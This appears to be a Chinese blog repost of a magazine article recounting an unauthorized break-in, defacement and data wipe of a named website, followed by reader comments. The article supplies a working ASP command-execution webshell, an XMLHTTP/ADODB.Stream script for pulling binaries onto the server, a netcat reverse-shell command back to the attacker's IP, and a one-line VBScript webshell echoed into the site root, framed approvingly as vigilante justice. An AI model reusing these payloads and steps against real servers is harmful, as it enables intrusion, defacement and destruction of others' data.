入侵骗子站xuehk.com全过程

鬼仔注:本文的亮点在“仔细看过讨论后得知原来用nc反弹回来的shell权限是比webshell权限高的”这句,其实这个以前在提权之道(关于WNDOWS 2003 目录权限的初探)中就提到过—“反弹回来的SHELL的权限与网站的权限是不一样的”。

文章作者:落叶纷飞[J.L.S.T]
信息来源:安全叶子技术小组[J.Leaves Security Team] (http://00day.cn)
本文已发表于黑客手册0807期,转载请保留此信息.

这篇文章在两个多月前的时候我就完成了,但是只是做为我自己的入侵笔记来用,并没有想过要投稿。但现在因为比较急用银子,所以就发给N0h4ck献丑了。(为了有人对号入座,我把图片稍稍处理了一下,请读者们见谅)。

最近在网上老是看到有人说被一个网址为“http://www.xuehk.com”的黑客培训机构骗了钱,而且骗取的金额数目可不少。于是,抱着为民除 害的心态,准备对这个所谓的黑客培训机构进行一次渗透。在网上搜索了一些关于这个网站的资料,得知,这个网站在前不久已经被人黑过了,如果现在还要再次入 侵的话,成功的几率可能比小,于是就叫上了几个朋友一起搞。
打开“http://www.xuehk.com”,发现网站的页面几乎都是静态的,如图1所示。

整理好思路后,我决定先从主站入手。用阿D和明小子注入工具进行了一次注入点扫面,结果无功而返,但这是我意料之中的事。然后,我变了一下思路,花了10多分钟搜集齐了www.xuehk.com的所有目录,目录如下:
http://www.xuehk.com/
http://www.xuehk.com/book/
http://www.xuehk.com/vip/
http://www.xuehk.com/pojie/
http://www.xuehk.com/js/
http://www.xuehk.com/xz/
http://www.xuehk.com/zs/
http://www.xuehk.com/shop/
http://www.xuehk.com/yewu/
http://www.xuehk.com/zs/photo/xiao/
http://www.xuehk.com/zs/photo/da/
http://www.xuehk.com/zs/photo/
我分别用网站猎手和明小子注入工具的批量扫描功能对这些目录进行后台扫描,然后我又用我自己加强过的NBSI一个一个的扫,结果依然是无功而返。看来从主 站入手是几乎没可能的了,于是乎开始旁注。打开“http://www.114best.com/ip/”对xuehk进行旁注查询,发现服务器上有很多 网站,很快我就找到了一个有漏洞的网站,如但是由于服务器安装了比较强的杀软,所以我只拿到了一个一句话webshell,图2所示。

把 webshell丢给朋友后,我用lake2的一句话木马客户端查看了一下服务器信息,webshell所在的网站根目录为“F:\wwwroot \****\wwwroot\”,****为网站域名的前段,所以,我推测xuehk.com的网站根目录为“F:\wwwroot\xuehk \wwwroot\”,于是我马上尝试跳转到此目录,但是没有权限。这时我想到asp.net的木马权限可能会比asp的高一点,但是上传好lake2的 asp.net一句话木马后却发现服务器不支持asp.net。
接着查看了一下终端信息,发现端口被改为了60015。查看了一下第三方软件的信息,结果serv-u路径找不到,而且默认密码改了,服务器上没有安装 PcanyWhere和Radmin,MSSQL和Mysql也没有安装,仔细再找了一下,也没有发现什么可利用的第三方软件,而且服务器的权限设置得很 死,连“开始→程序”都打不开。
上传cmd.asp准备尝试执行命令,但cmd.asp也被服务器的杀毒软件给kill了,于是,自己操刀写了个执行cmd命令的asp脚本,代码如下:

<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<%if err then%>
<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
<%
end if
response.write("<textarea readonly cols=80 rows=20>")
On Error Resume Next
response.write oScriptlhn.exec("cmd.exe /c" & request("c")).stdout.readall
response.write("</textarea>")
response.write("<form method='post'>")
response.write("<input type=text name='c' size=60><br>")
response.write("<input type=submit value='执行'></form>")
%>

成功上传到服务器后,执行cmd.asp命令失败。我想可能是管理员删除了cmd.exe,也可能是服务器的权限设置问题,用一句话木马查看服务器服务信 息发现Wscript并没有被禁止,本想用Wscript来执行命令,但是连一些能写的目录都找不到,常用的everyone目录都不能用,至此,提权陷 入了死局。感觉没什么意思,就跟朋友说了下情况出去玩了。
晚上回来的时候,朋友说找了N个小时,终于找到了一个能写的目录,目录位置是“C:\Program Files\free3web~”,这着实吓了我一跳,一个软件的目录居然能写?打开这个目录看了看,不知道是什么东西,就搁在了一边。准备把cmd上传 到服务器的时候我又发现了一个问题,就是我该如何把二进制文件传上服务器呢?一句话木马只支持文本上传。有的朋友可能说用Wget.vbs来下载,但是你 想想,我们该怎么执行命令让Wget.vbs去下载文件呢?经过一会儿的思考,我终于想到了一个办法,不能上传,但能下载吧?于是我在网上找到了一个可行 的办法,就是利用Microsoft.XMLHTTP来下载文件到服务器上。我们先把cmd.exe传上自己的网站上(为了减少体积,我用FSG压缩了 cmd.exe!),然后打开一句话木马客户端增强版,填好一句话木马的信息后,把第三个框清空,再把第二个框的代码换成:

Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","被下载文件的网址",False
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath("保存的文件名"),2
set sGet = nothing
set sPOST = nothing
response.Write("下载成功!")

再点击“GO”按钮后,一会儿文件就会被下载到服务器上了,如图3、4所示。


上传好cmd.exe后,在我刚才写的cmd.asp脚本的代码中把“cmd.exe”改为“C:\Program Files\free3web~\cmd.exe”,尝试着执行了一下命令,发现执行成功!看来不需要用Wscript来执行命令了,如图5所示。

用 dir命令想查看F盘的文件,但是没有权限,真是郁闷死我了,能执行命令但又没有利用价值,于是我就准备在网上查一些关于服务器提权的文章,看看别人的提 权思路。谁知我无意中看到一篇关于webshell下nc反弹的权限讨论,仔细看过讨论后得知原来用nc反弹回来的shell权限是比webshell权限高的!于是我马上弄了一个我免杀过的nc到服务器上,在本地打开cmd,输入命令“nc -vv -l -p 2006”,然后在webshell中输入“c:\Program~\freeweb\nc.exe -e c:\Program~\freeweb\cmd.exe 我的IP 2006”,一会儿nc就有回应了,我尝试执行命令“net user aa aa /add”,结果失败,证明权限不是system,但当我用命令“dir F:\wwwroot\xuehk\wwwroot\”的时候,居然成功的列出了xuehk.com网站的所有文件,如图6所示。

然后我试着用echo命令来在xuehk.com写一个文件,输入

echo H4cked by 落叶纷飞>luoye.txt

成功写入了xuehk.com的网站根目录,如图7所示。

现在来echo一个一句话木马吧!输入

echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^>>luoye.asp

成 功写入luoye.asp,但因为服务器屏蔽了asp调试错误的信息,所以打开luoye.asp时返回的页面是500内部错误,但是这并不影响一句话木 马的使用,我用lake2的一句话木马客户端连接上xuehk.com的一句话木马后,用它的“Edit TextFile”功能把xuehk.com的首页文件index.asp替换成了黑页,并且在nc反弹回来的shell中将其数据完全删除掉了,也算是 给他们一个小小的教训吧!总的来说,这次入侵的目的还是达到了。

相关日志

楼被抢了 10 层了... 抢座Rss 2.0或者 Trackback

  • aaa

    怀疑文章的真实性 呵呵 感觉作者特意隐藏关键的一些获取权限部分的东西

  • 笨笨

    抢个座。。。。

  • TAOTAO

    板凳….
    支持!这个文章貌似看过的.

  • sniper

    ….

  • knight

    你每次发文章是不是用离线工具呀,还有图片都是外联,那不是很麻烦?还要把图片都传到yupoo.

  • 人鱼姬

    这该怎么解释呢?

    nc继承的是webshell的权限,nc只是把cmd输入输出重定向,如果nc能执行“dir F:\wwwroot\xuehk\wwwroot\”,我认为webshell也能执行“dir F:\wwwroot\xuehk\wwwroot\”

  • 小C

    同意人鱼姬的观点,站搞的多了就知道了。
    nc反弹回来的权限比webshell里的大,怀疑中。。

  • 鬼仔

    @knight: 不太喜欢离线的,都是WP后台发,启用gears之后速度也不是太慢,图片确实是每次都要传到yupoo,比较麻烦。
    @人鱼姬: @小C: nc反弹回来的权限是NETWORK SERVICE。

    • 周大侠

      yupoo有流量限制的,普通用户才60MB/月,,,,,,
      够用??????

  • oScriptlhn

    本机测试,缺少对象oScriptlhn

发表评论